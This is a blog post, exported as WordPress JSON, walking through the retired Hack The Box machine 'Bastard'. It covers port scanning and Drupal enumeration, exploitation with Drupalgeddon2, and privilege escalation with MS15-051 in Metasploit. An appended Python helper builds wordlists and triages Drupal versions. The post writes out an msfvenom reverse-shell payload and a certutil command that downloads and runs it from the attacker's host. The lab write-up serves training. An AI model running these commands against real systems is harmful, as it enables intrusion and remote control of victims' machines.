{"id":171,"date":"2024-11-13T10:47:01","date_gmt":"2024-11-13T02:47:01","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=171"},"modified":"2024-11-13T10:47:02","modified_gmt":"2024-11-13T02:47:02","slug":"171","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/171\/","title":{"rendered":"HTB Machine Bastard Penetration Test Write-up"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code>10.10.10.9<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.9 (10.10.10.9) 56(84) bytes of data.\n64 bytes from 10.10.10.9: icmp_seq=1 ttl=127 time=169 ms\n64 bytes from 10.10.10.9: icmp_seq=2 ttl=127 time=1137 ms\n64 bytes from 10.10.10.9: icmp_seq=3 ttl=127 time=168 ms\n64 bytes from 10.10.10.9: icmp_seq=4 ttl=127 time=169 ms\n\n--- 10.10.10.9 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3294ms\nrtt min\/avg\/max\/mdev = 168.337\/410.891\/1137.177\/419.321 ms, pipe 2<\/code><\/pre>\n<p>Connectivity between the attack box and the target is good. The replies come back with <code>ttl=127<\/code>, one router hop below the Windows default of 128, which is an early hint that the target runs Windows.<\/p>\n<h2>Firewall Check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 20 09:22:04 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nAll 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Fri Sep 20 09:23:11 2024 -- 1 IP address (1 host up) scanned in 66.89 seconds<\/code><\/pre>\n<p>The FIN scan gets no reply from any port, so all 65535 show as <code>open|filtered<\/code>. On its own that does not settle whether a firewall is present (a probe dropped by a filter and a probe left unanswered look the same), so the next step is a full TCP port scan. Note that the SYN scan below reports 65532 ports as <code>filtered<\/code> rather than <code>closed<\/code>: a host with no firewall would answer closed ports with RST, so something on the target is dropping unsolicited packets.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code>TCP<\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 20 09:30:49 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nNot shown: 65532 filtered tcp ports (no-response)\nPORT      STATE SERVICE VERSION\n80\/tcp    open  http    Microsoft IIS httpd 7.5\n|_http-server-header: Microsoft-IIS\/7.5\n|_http-title: Welcome to Bastard | Bastard\n| http-methods: \n|_  Potentially risky methods: TRACE\n| http-robots.txt: 36 disallowed entries (15 shown)\n| \/includes\/ \/misc\/ \/modules\/ \/profiles\/ \/scripts\/ \n| \/themes\/ \/CHANGELOG.txt \/cron.php \/INSTALL.mysql.txt \n| \/INSTALL.pgsql.txt \/INSTALL.sqlite.txt \/install.php \/INSTALL.txt \n|_\/LICENSE.txt \/MAINTAINERS.txt\n|_http-generator: Drupal 7 (http:\/\/drupal.org)\n135\/tcp   open  msrpc   Microsoft Windows RPC\n49154\/tcp open  msrpc   Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|phone|specialized\nRunning (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)\nOS CPE: cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_server_2008:r2 cpe:\/o:microsoft:windows_8.1 cpe:\/o:microsoft:windows_vista::- cpe:\/o:microsoft:windows_vista::sp1\nAggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   169.89 ms 10.10.14.1 (10.10.14.1)\n2   169.86 ms 10.10.10.9 (10.10.10.9)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Sep 20 09:33:17 2024 -- 1 IP address (1 host up) scanned in 147.90 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> open-port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Sep 20 09:37:48 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.9\nNmap scan report for 10.10.10.9 (10.10.10.9)\nHost is up (0.17s latency).\nAll 65535 scanned ports on 10.10.10.9 (10.10.10.9) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Fri Sep 20 09:38:55 2024 -- 1 IP address (1 host up) scanned in 67.18 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> port detail scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>Three TCP ports answer: <code>80<\/code> (<code>Microsoft IIS 7.5<\/code> serving a <code>Drupal 7<\/code> site whose <code>robots.txt<\/code> lists 36 disallowed paths) and the MSRPC ports <code>135<\/code> and <code>49154<\/code>; nothing answers on UDP. Nmap's OS guess of <code>Windows 8.1<\/code> is unreliable here, as it warns itself, because it had no closed port to compare against. <code>IIS 7.5<\/code> is the version that ships with <code>Windows Server 2008 R2<\/code> and <code>Windows 7<\/code>, so a 2008 R2 server is the better working assumption.<\/p>\n<hr \/>\n<h1>Service Enumeration<\/h1>\n<h2>Web Application (port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/bastard.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726880070810-4e3e6767-e3b0-412f-9849-4a4d223a311f.png\" alt=\"\" \/><\/p>\n<p>The site runs the <code>Drupal 7<\/code> content management system. Next, <code>robots.txt<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1726880390590-3cd30117-1c40-45ab-a7aa-1c446f0b0c5c.png\" alt=\"\" \/><\/p>\n<p>The <code>Disallow<\/code> entries in that file make a ready-made directory wordlist; a directory scan with it gives the following results:<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Sat Sep 21 09:09:04 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/bastard.htb\/ -x 400,403,404 -e php,js,html,txt,zip,tar.gz,pcap -t 60 -w .\/robots.lst\n\n301   150B   http:\/\/bastard.htb\/modules    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/modules\/\n301   150B   http:\/\/bastard.htb\/scripts    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/scripts\/\n301   151B   http:\/\/bastard.htb\/includes    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/includes\/\n301   149B   http:\/\/bastard.htb\/themes    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/themes\/\n301   147B   http:\/\/bastard.htb\/misc    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/misc\/\n200     2KB  http:\/\/bastard.htb\/INSTALL.mysql.txt\n200     2KB  http:\/\/bastard.htb\/INSTALL.pgsql.txt\n301   151B   http:\/\/bastard.htb\/profiles    -&gt; REDIRECTS TO: http:\/\/bastard.htb\/profiles\/\n200     1KB  http:\/\/bastard.htb\/INSTALL.sqlite.txt\n200    10KB  http:\/\/bastard.htb\/UPGRADE.txt\n200     9KB  http:\/\/bastard.htb\/MAINTAINERS.txt\n200    18KB  http:\/\/bastard.htb\/LICENSE.txt\n200    18KB  http:\/\/bastard.htb\/INSTALL.txt\n200    42B   http:\/\/bastard.htb\/xmlrpc.php\n200     7KB  http:\/\/bastard.htb\/user\/password\n200   108KB  http:\/\/bastard.htb\/CHANGELOG.txt\n200     3KB  http:\/\/bastard.htb\/install.php\n200     8KB  http:\/\/bastard.htb\/?q=user\/register\n200    13KB  http:\/\/bastard.htb\/?q=filter\/tips\n200     7KB  http:\/\/bastard.htb\/user\/login\n200     8KB  http:\/\/bastard.htb\/user\/register\n200     7KB  http:\/\/bastard.htb\/?q=user\/password\n200     7KB  http:\/\/bastard.htb\/?q=user\/login\n200     8KB  http:\/\/bastard.htb\/?q=comment\/reply\n200    13KB  http:\/\/bastard.htb\/filter\/tips<\/code><\/pre>\n<p><code>CHANGELOG.txt<\/code> is readable by anyone and its first entry gives the Drupal version as <code>7.54<\/code>. Searching for vulnerabilities matching that version:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727480039679-67b3036b-780f-4c02-9b29-8a539cfc392a.png\" alt=\"\" \/><\/p>\n<pre><code class=\"language-plain\">Drupal &lt; 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code - CVE-2018-7602\nDrupal &lt; 7.58 \/ &lt; 8.3.9 \/ &lt; 8.4.6 \/ &lt; 8.5.1 - 'Drupalgeddon2' Remote Code Execution - CVE-2018-7600\nDrupal 7.x Module Services - Remote Code Execution - EDBID-41564<\/code><\/pre>\n<p>That gives three candidates, each with different preconditions. <code>CVE-2018-7600<\/code> (Drupalgeddon2) needs no authentication and affects every 7.x release before 7.58. <code>CVE-2018-7602<\/code> (Drupalgeddon3) needs an authenticated account; despite the searchsploit title, its fix shipped in 7.59. <code>EDB-41564<\/code> targets the contributed Services module and only applies if that module is installed with a REST endpoint enabled, which is independent of the core version.<\/p>\n<hr \/>\n<h1>Exploitation<\/h1>\n<p>Trying the three candidates in turn, the <code>CVE-2018-7600<\/code> attack succeeds and yields command execution:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727480888148-d460117e-af5f-4245-ba59-39356e0e0e4e.png\" alt=\"\" \/><\/p>\n<p>Generate a reverse shell payload:<\/p>\n<pre><code class=\"language-shell\">msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o .\/reverse.exe<\/code><\/pre>\n<p>Then start a local <code>Metasploit<\/code> listener for that payload and use the following <code>Windows CMD<\/code> commands, run through the command execution gained above, to download and launch it:<\/p>\n<pre><code class=\"language-powershell\">certutil -urlcache -split -f http:\/\/10.10.14.2\/reverse.exe C:\\inetpub\\drupal-7.54\\reverse.exe\n.\\reverse.exe<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727482513478-cd9185c9-f5a2-4f0b-b5ee-72cf54935fb2.png\" alt=\"\" \/><\/p>\n<p><strong>Success!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Local Exploit Check<\/h2>\n<p>With a shell in hand, run the <code>post\/multi\/recon\/local_exploit_suggester<\/code> module against the session to look for local privilege-escalation exploits; it reports <code>12<\/code> candidate modules:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727482954990-5e98f67e-c1e5-4f52-8471-2bdc9791df55.png\" alt=\"\" \/><\/p>\n<p><code>MS15-051<\/code>, a win32k.sys kernel privilege-escalation bug, is the one to try first.<\/p>\n<h2>Exploiting MS15-051<\/h2>\n<p>Load the <code>Metasploit<\/code> module <code>exploit\/windows\/local\/ms15_051_client_copy_image<\/code>, point <code>SESSION<\/code> at the current session ID and set the listener address for the new payload:<\/p>\n<pre><code class=\"language-shell\">set SESSION 4\nset LHOST 10.10.14.2\nset LPORT 4444\nrun<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727486788449-23a048d8-294f-4f21-b7e7-fc1e487923f6.png\" alt=\"\" \/><\/p>\n<p>Running the module:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727486847113-e8b81fb4-29f9-4bf3-aa12-adc06b890e49.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation successful!<\/strong><\/p>\n<hr \/>\n<h1>Flag Files<\/h1>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1727487465413-ad843e05-056b-458e-9ce0-4557cb18af80.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>This machine's penetration test ends here<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.10.10.9 Information Gathering ICMP Check PING 10.10.10.9 (10.10.10.9) 56( &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-171","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=171"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171\/revisions"}],"predecessor-version":[{"id":172,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/171\/revisions\/172"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=171"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/
\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=171"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
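The service-enumeration steps of the write-up above (turning the robots.txt Disallow entries into a dirsearch wordlist, reading the Drupal version out of CHANGELOG.txt, and matching it against the three advisories searchsploit returned) as one added Python example. This is not code from the original post; the robots.txt and CHANGELOG.txt samples are constructed to resemble what Drupal 7 ships, and the fix versions in FIX_VERSIONS come from Drupal's advisories SA-CORE-2018-002 and SA-CORE-2018-004 (note that Drupalgeddon3 was fixed in 7.59, not 7.58 as the searchsploit title suggests). The Services RCE (EDB-41564) cannot be decided from the core version, so the triage only reports it as a manual check.

```python
"""Drupal pre-exploitation recon helpers (added example, not the post's code).

Turns the Disallow entries of robots.txt into a dirsearch-style wordlist,
reads the core version out of CHANGELOG.txt and compares it with the fix
versions of the advisories listed in the write-up. SAMPLE_ROBOTS and
SAMPLE_CHANGELOG are constructed samples, not captured from the target.
"""
import re
from typing import Dict, List, Optional, Tuple

SAMPLE_ROBOTS = """\
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.txt
# Paths (clean URLs)
Disallow: /admin/
Disallow: /user/register/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=user/register/
Allow: /misc/*.css
"""

SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition).

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions.
"""

# Fix versions from SA-CORE-2018-002 (CVE-2018-7600) and SA-CORE-2018-004
# (CVE-2018-7602), keyed by release branch. searchsploit's title lists
# Drupalgeddon3 as "< 7.58", but that fix actually shipped in 7.59.
FIX_VERSIONS: Dict[str, Dict[str, str]] = {
    "CVE-2018-7600 Drupalgeddon2 (unauthenticated RCE)":
        {"7": "7.58", "8.3": "8.3.9", "8.4": "8.4.6", "8.5": "8.5.1"},
    "CVE-2018-7602 Drupalgeddon3 (authenticated RCE)":
        {"7": "7.59", "8.5": "8.5.3"},
}


def robots_to_wordlist(text: str) -> List[str]:
    """Turn Disallow targets into wordlist entries, first-seen order, no duplicates.

    Keeps both the clean-URL form (user/register) and the ?q= form, strips the
    surrounding slashes and drops glob patterns, which are not concrete paths.
    """
    seen, words = set(), []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        m = re.match(r"(?i)disallow\s*:\s*(\S+)", line)
        if not m or "*" in m.group(1) or "$" in m.group(1):
            continue
        path = m.group(1).strip("/")
        if path and path not in seen:
            seen.add(path)
            words.append(path)
    return words


def drupal_version_from_changelog(text: str) -> Optional[str]:
    """Return the newest release header, e.g. '7.54'.

    CHANGELOG.txt lists releases newest-first as 'Drupal 7.54, 2017-02-01',
    so the first match is the installed version (unless the file is stale).
    """
    m = re.search(r"^Drupal (\d+\.\d+(?:\.\d+)?),", text, re.MULTILINE)
    return m.group(1) if m else None


def _vtuple(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))


def triage(version: str) -> List[str]:
    """Compare a core version with FIX_VERSIONS and append the Services caveat."""
    v = _vtuple(version)
    branch = "7" if v[0] == 7 else ".".join(str(p) for p in v[:2])
    notes = []
    for name, fixes in FIX_VERSIONS.items():
        fix = fixes.get(branch)
        if fix is None:
            notes.append(f"{name}: branch {branch} not in table, check the advisory")
        elif v < _vtuple(fix):
            notes.append(f"{name}: {version} < {fix}, likely vulnerable")
        else:
            notes.append(f"{name}: {version} >= {fix}, patched")
    # EDB-41564 is a bug in the contributed Services module, not in core, so
    # no core version check can confirm or rule it out.
    notes.append("EDB-41564 Services RCE: applies only if the Services module "
                 "exposes a REST endpoint; confirm by enumeration")
    return notes


if __name__ == "__main__":
    print("\n".join(robots_to_wordlist(SAMPLE_ROBOTS)))
    ver = drupal_version_from_changelog(SAMPLE_CHANGELOG)
    print(f"\nDrupal {ver}")
    print("\n".join(triage(ver)))
```

Feed the wordlist to dirsearch with `-w` as the post does; the `?q=` entries are kept deliberately because a Drupal site without clean URLs only answers on that form.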